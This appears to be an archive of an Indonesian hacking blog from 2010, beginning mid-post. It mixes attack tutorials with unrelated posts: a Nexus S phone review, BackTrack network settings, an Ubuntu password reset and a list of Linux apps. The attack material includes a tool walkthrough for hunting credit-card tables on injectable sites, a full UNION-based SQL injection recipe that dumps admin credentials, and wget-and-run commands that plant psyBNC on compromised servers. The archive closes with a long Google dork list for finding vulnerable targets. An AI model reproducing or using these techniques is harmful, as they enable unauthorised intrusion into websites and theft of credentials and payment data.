trus scan, kalo sudah muncul link" yg kluar silah kan di klick kanan trus remove duplicate, biar ga keder



lalu pindah ke TAB sql injector query builder
masukan argumen tanda tanya(?)di insert arguments here
kalo sudah klick Build Dan Scan






trus ke tab berikut nya yaitu tab attack victim
cari yg error result nya : unclosed quotation mark before the character ..... ga tau knp pokok nya ikutin aja jgn banyak tanya :p
klick kanan copy url yg victim






tahap pemakaian sql exploiter2
buka sql exploiter trus ke tab attacker for the hackable SHIT !!
klik add manualy , masukan url yg victim tadi, trus paste (kadang tanda ' harus di hilangkan)





kalo udah klick site info sampe info nya keluar
kalo udah keluar maka tingal get table, maka akan muncul table" web tersebut, yg ku tandai warna biru






pilih salah 1 yg ada di table tsbt, yg kira" dimana letak CC nya, trus get columb buat mengetahui colum apa aja di table tsb, tapi x ini aku ga ke table order
kalo udah muncul smua colomb , drag smua colom trus get data



Smoga bermanfaat..

Jumat, 17 Desember 2010

SQL injection step by step

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .


Smoga Bermanfaat..

Rabu, 15 Desember 2010

Tutorial Membuat PSYBNC di Shell Inject

Hah, rasanya setelah ujian selesai dan tugas" terselesaikan rasanya ingin menulis lagi.. :D
oke langsung ajaa..

bagaimana cara membuat PSYBNC cukup dengan 3 langkah... Hanya saja yang paling susah adalah mencari shell nya... Susahhhh banget... Kecuali kalau sewa shell resmi itu pasti mudah bagi yang punya uang... hehehehe...atau lebih mudah lagi sewa PSYBNC. Banyak sekali yang menyewakan PSY. Pengumuman bagi yang mempunyai shell boleh dibagi-bagi dunk... huehuehuehuehue.... Ohh ya atau malah mendaftar pada penyedia PSYBNC atau BNC GRATIS. Coba aja cek link ini. Mungkin masih menyediakan yang gratis. Klik Link Ini salah satu penyedi PSYBNC atau BNC Gratis (Kalau sudah gak aktif ya maap, namanya saja gratisan..huehueheuhueh). Bahkan banyak juga penyedia PYBNC sebagai hadiah. (harus berusaha menang dulu sich....)
Oke. kita mulai tutorial
  • Cek dulu apakah shell inject tersebut bisa di pakai untuk PSYBNC. Misalnya di #kartosuro. Cara ceknya adalah !port 123.234.433.234 20000. atau !port contoh.com 20000. Keterangan !port IP port (20000 adalah port yang akan di gunakan). Kalau conection refused, berarti shell inject tersebut bisa digunakan. Kalau time out.. cari lagi aja shellnya.
  • Kita anggap Conection reffused. Berarti siap untuk membuat PSYBNC.
  • Download psy.tar.gz DISINI.
  • Upload ke file hosting gratis. Misalnya filleden, ripway, fileave dan masih banyak lagi hosting gratisan.
  • Tiga langkah tersebut adalah :
cd /tmp;wget http://kartosuro.fileave.com/psy.tar.gz
cd /tmp;tar -zxvf psy.tar.gz
cd /tmp;cd .psy;./config 10000;./fuck;./run
Keterangan :
Misal menggunakan hosting fileave (anda bisa menggunakan hosting yang lain), 10000 adalah port yg akan di pakai, psy akan diletakkan di folder tmp
  • Setelah itu cek lagi di #kartosuro !port 123.234.433.234 20000. atau !port contoh.com 20000. Kalau connection accept berarti udah siap di pake itu psy. Tinggal masuk memakai MIRC dengan ident dan pass yang anda tentukan. Ingat... yang masuk pertama kali adalah sebagai admin psy sehingga bisa add user
  • Ketik saja /s target.com port (masuk ke mirc)
  • Masuk pertama akan di pv oleh PSYBNC dia akan meminta server yang dibutuhkan.
  • Cara add server : addserver irc.plasa.com:6667 (contoh)
  • Untuk comand PSYBNC yang lain bisa anda ketik /bhelp di dalam pv si PSYBNC tersebut.
  • Berarti PSY nanti akan koneksi ke Allnetwork.
Maaf bagi para master MIRC bila dalam tutorial ini ada kesalahan, mohon di koreksi.
Selamat mencoba.. Semoga bermanfaat..

Kamis, 09 Desember 2010

Review Google Nexus S: inilah ponsel Andoid terhebat saat ini

Google Nexus S akhirnya resmi diluncurkan dan menjanjikan banyak hal baru baik dari segi hardware maupun software dimana yang satu ini sudah menggunakan Android 2.3 (Gingerbread).

Apa saja yang baru dari segi hardware?
– Nexus S punya layar 4 inch Super AMOLED (WVGA, 480×800) dengan tingkat kontras yang lebih baik sehingga mudah dilihat di bawah sinar matahari dan layarnya memang dibuat oleh Samsung.

Layar yang disebut Contour Display ini agak unik karena bentuknya agak melengkung yang katanya akan nyaman digunakan dan katanya pas di muka anda

- Prosesor yang digunakan adalah Hummingbird 1 GHz dengan memori internal 16 GB yang diklaim sebagai prosesor tercepat saat ini.

Sedangkan dari sisi software, memang sangat menjanjikan karena penggunaan Android 2.3 (Gingerbread):
– Cut, Copy and Paste
Dengan Gingerbread, urusan copy and paste jauh lebih mudah karena ada "highlight" untuk memastikan bahwa pilihan teks yang diinginkan benar (lihat video).

- Portable Wi-Fi hotspot
Yang satu ini bukan hal baru tetapi di Gingerbread sudah menjadi standar dimana kita bisa menggunakan ponsel sebagai Wi-Fi hotspot dan bisa digunakan sampai 6 alat sekaligus.

- Google Maps with Navigation (Beta)
Semakin nyaman bernavigasi dengan Google Map dan kabarnya di versi baru (Google Maps for Mobile 5) kita sudah bisa melakukan navigasi secara offline yang artinya kita tidak perlu koneksi internet lagi.

Secara keseluruhan, mungkin inilah ponsel Android yang paling terhebat saat ini baik dari segi hardware maupun software tetapi sepertinya sama dengan Google Nexus One, Nexus S juga tidak
akan masuk indonesia.. 

Cara Setting IP (LAN / WAN) di Backtrack 4 R1


Cerita dulu dikit duluu, ni command-2 yang biasanya di pake sebagai berikut :

ifconfig : for setting interface
ifconfig -a : view all interface
ifconfig eth0 up/down : enable / disable (On/Off) interface LAN
dhclient eth0 / wlan0 : request ip dari dhcp server (dhcp client)
iwconfig : for setting wireless
ifconfig wlan0 up/down : enable / disable (On/Off) interface wlan
iwconfig wlan0 mode monitor : for setting mode interface wlan ke mode monitor, biasanya untuk keperluan hacking Wifi ni (airmon-ng)
iwconfig wlan0 mode managed : for setting mode interface wlan ke mode managed, biasanya kl untuk koneksi ke Access Point saya pake mode ini
macchanger -s wlan0 : view mac wlan

Cara Setting IP di Backtrack :
Misal : IP LAN 192.168.0.225/24 (netmask : /24 = 255.255.255.0)
Gateway : 192.168.0.1
DNS Server : 203.134.196.155 & 203.134.208.250 (hanya contoh lho ini)

Cara 1 :

1. Buka Konsole (root@bt:~#ifconfig eth0 down)
2. root@bt:~#ifconfig eth0 192.168.0.225 netmask 255.255.255.0
3. root@bt:~#route add default gw 192.168.0.20
4. root@bt:~#echo name server 203.134.196.155 /etc/resolv.conf
5. root@bt:~#echo name server 203.134.208.250 /etc/resolv.conf
6. root@bt:~#ifconfig eth0 up (jangan lupa untuk setting up ini)
7. root@bt:~#ifconfig -a (pastikan di interface eth0 ip nya sesuai yang sudah di setting ini)
8. root@bt:~#ping 192.168.0.1 (pastikan hasilnya reply)
9. root@bt:~#ping 203.134.196.155 (pastikan hasilnya reply juga jika memang setting IP DNS anda benar).
10.root@bt:~#ping ke www.google.com (pastikan hasilnya reply, sehingga anda sudah isa berselancar ke dunia maya).

Note : Jika ingin setting yang wireless, eth0 di ganti dengan wlan0 (wlan0 : laptop saya wifine di kenali dengan nama ini), mungkin di laptop teman-2 di kenali dengan nama lain ya nanti tinggal nyesuaikan aja,

Cara 2 :

root@bt:~#nano /etc/network/interfaces
auto eth0
iface eth0 inet static

address 192.168.0.225
netmask 255.255.255.0
network 192.168.0.0
broadcast 192.168.1.255
gateway 192.168.0.20
CTRL+x lalu save (yes)

setting dns :
root@bt:~## nano /etc/resolv.conf
nameserver 203.130.193.74 (atau isi dgn dns kesukaan anda)

mengaktifkan NIC

root@bt:~#ifconfig eth0 down
root@bt:~#ifconfig eth0 up
root@bt:~#/etc/init.d/networking restart
root@bt:~#/etc/init.d/networking start

Demikian sedikit share dari saya & semoga bermanfaat.

Cara Mudah Mereset Password Ubuntu 10.04

Lama tak menyalakan komputer? atau sedang sibuk dengan sistem operasi lain hingga lupa dengan password login pada Ubuntu. Jika itu yang terjadi, lalu apa yang bisa anda lakukan agar bisa kembali menggunakan Ubuntu?. Berikut ini cara mudah mereset password user pada ubuntu. Ada beberapa cara yang bisa kita coba, pertama adalah dengan "recovery mode" dan yang kedua adalah dengan menggunakan Live CD Ubuntu.

Cara ini adalah dengan recovery mode, sedangkan cara yang lain mungkin dilain kesempatan. Dalam contoh ini kita menggunakan Ubuntu 10.04 dan akan mereset password user yang ada didalamnya.

Langkah pertama, booting komputer anda. Saat ditampilkan menu grup, silahkan pilih opsi "Ubuntu, with Linux 2.6.xxx-generic (recovery mode)" dimana xxx adalah versi kernel Linux yang anda gunakan, lalu tekan enter untuk memulai...
Ubuntu mode recover akan segera dijalankan, tunggulah beberapa saat hingga "recovery menu" ditampilkan. Pada menu ini, silahkan pilih opsi "root Drop to root shell prompt" (menu paling bawah, lihat gambar ntuk lebih jelasnya) lalu tekan enter...
Sistem akan dijalankan dan anda akan dibawa ke root direktori Ubuntu. Kini tiba saatnya untuk mereset password user. Lho apa nama usernya yaaa?... hehehe sudah lupa password lupa pula nama usernya. Jika ini terjadi pada anda, untuk mengetahui nama user yang ada pada sitem Ubuntu 10.04 adalah dengan cara masuk ke home direktori (/home). Ketik "cd /home" lalu tekan enter. Untuk menampilkan daftar user ketik "dir" lalu tekan enter. Dalam contoh ini kami hanya memiliki satu nama user yaitu "lab", silahkan lihat gambar..


 

Setelah mengetahui nama user yang hendak direset passwordnya, silahkan kembali ke root direktori dengan cara mengetik "cd" pada console lalu tekan enter. Sekarang saatnya memberi perintah untuk penggantian password user. Ketik "passwd nama_user" lalu tekan enter, silahkan sesuaikan "user_name" dengan nama user pada komputer Anda. Dalam contoh ini kami mengetik "passwd lab" sebab user yang akan kami reset passwordnya bernama "lab"

Pada "Enter new UNIX password:" silahkan ketik password yang anda inginkan lalu tekan enter. Ulangi lagi dengan memasukkan password yang sama pada "Retype new UNIX password:" lalu tekan enter..


Nahhh.. kini anda telah berhasil mereset password user Ubuntu 10.04 ditandai dengan ditampilkannya pesan "passwd: password updated successfully". Ketik "reboot" pada console lalu tekan enter untuk segera merestart komputer dan login menggunakan password yang baru saja Anda buat..
Selamat mencoba dan Smoga Bermanfaat..

Melakukan kebiasaan di Windows menggunakan Linux

Buat para pengguna windows yang ingin mencoba Sistem Operasi bebas dan open source seperti linux biasanya agak khawatir kalo semua kegiatan yang biasa dilakukan menggunakan Sistem Operasi Windows tidak bisa dilakukan jika menggunakan Linux. Jangan takut akan hal itu, karena di Linux juga terdapat aplikasi-aplikasi yang biasa kita gunakan di WIndows.

Untuk pemula di Linux bisa menggunakan Distro Ubuntu sebagai distro yang dirancang khusus untuk pengguna WIndows yang ingin bermigrasi ke Linux. Lihat saja Ubuntu versi 9.10 Karmic Koala yang telah disediakan instalasi Sistem Operasi melalui windows.

Windows vs Linux
Q: Apa sih perbedaan Windows, Linux, Redhat dan Ubuntu?
A: Windows itu contohnya : Windows 98, Windows ME, Windows XP, Vista, Longhorn, Windows 7. Sedangkan Linux itu contohnya : Redhat, Ubuntu, Slackware, Debian, dll. (Got it?)

Q : Apakah aplikasinya sama saja? Memangnya apa saja sih yang biasa kita lakukan di Windows?
A:
[Office Work]
- Pengguna Windows yang terbiasa menggunakan MsOffice, di ubuntu juga disediakan OpenOffice yang sudah otomatis terinstall yang juga sudah bisa membaca ekstensi MsOffice 2007 seperti *.DOCX, *.XLSX

[Grafis]
- Buat graphic designer, GIMP Editor dapat digunakan sebagai pengganti Photoshop.

[Player]
- Aplikasi VLC merupakan pengganti DVDPlayer di Linux
- XMMS sebagai aplikasi pengganti Winamp

Serta dibawah ini beberapa aplikasi lain yang mungkin biasa digunakan diWindows
- Aplikasi Bluetooth => KDEBluetooth,
- Phone Manager (PC Suite) => Wammu, ObexTool
- Aplikasi Editor (DreamWeaver) => Kompozer, gedit, Vim.
- Aplikasi ScreenCapture => KSnapShot, XVidCap (Capture kegiatan di Desktop)
- Aplikasi Chat (YM) => Kopete, Pidgin
- FTP Manager => FileZilla
- Visual Programming (VB, Delphi) => Gambas
- Scanner => AngryIPScanner

Jadi bisa khan semua aplikasi yang biasa kita kerjakan diWindows juga bisa dilakukan di Linux?
So, kenapa kita tidak mencoba Linux sekarang??? ^_^

Rabu, 01 Desember 2010

Dork SQL I

Uuntuk jumpa kali ini saya tidak bisa membuat kan kata" yang panjang tetapi saya akan memberikan Dork SQL I jadi nya tinggal santap aja dah..
monggo..

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=

inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=